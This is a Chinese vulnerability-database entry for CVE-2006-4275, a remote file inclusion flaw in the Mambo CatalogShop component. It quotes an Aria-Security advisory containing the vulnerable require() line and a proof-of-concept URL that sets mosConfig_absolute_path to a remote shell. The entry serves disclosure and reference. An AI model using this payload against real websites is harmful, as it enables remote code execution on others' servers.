Mambo CatalogShop组件 'catalogshop.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193763 漏洞类型 输入验证
发布时间 2006-08-21 更新时间 2006-08-26
CVE编号 CVE-2006-4275 CNNVD-ID CNNVD-200608-348
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006080142
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-348
|漏洞详情
Mambo(com_catalogshop中CatalogShop组件的catalogshop.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助mosConfig_absolute_path参数中的URL执行任意PHP代码。
|漏洞EXP
		########################################################################
###################

#			Aria-Security.net Advisory                                        #

#			Discovered  by: O.U.T.L.A.W                                       #			#			< www.Aria-security.net >                                      	  #

#		Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp                      	  #

#		                                  		    			  #

########################################################################
###################

#Software: Mambo CatalogShop

#Attack method: Remote File Inclusion

#Descriptio : This is a modified version of the FacileForms mambot, which allows you to add and view user comments and ratings below content in the categories setup in xtdratings. Just publish it!

#Source:

# Variables - Don't change anything here!!!

require($mosConfig_absolute_path."/administrator/components/com_catalogs
hop/config.catalogshop.php");

************************************************************************
************

#Proof of Concept:

#http://www.site.com/catalogshop.php?mosConfig_absolute_path=shell

#

#----------------------------------------------------------

#

#

#Contact : Outlaw (at) aria-security (dot) net [email concealed]
|参考资料

来源:BID
名称:19604
链接:http://www.securityfocus.com/bid/19604
来源:BUGTRAQ
名称:20060819MamboCatalogShopRemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/443758/100/0/threaded
来源:XF
名称:catalogshop-absolutepath-file-include(28462)
链接:http://xforce.iss.net/xforce/xfdb/28462
来源:SREASON
名称:1433
链接:http://securityreason.com/securityalert/1433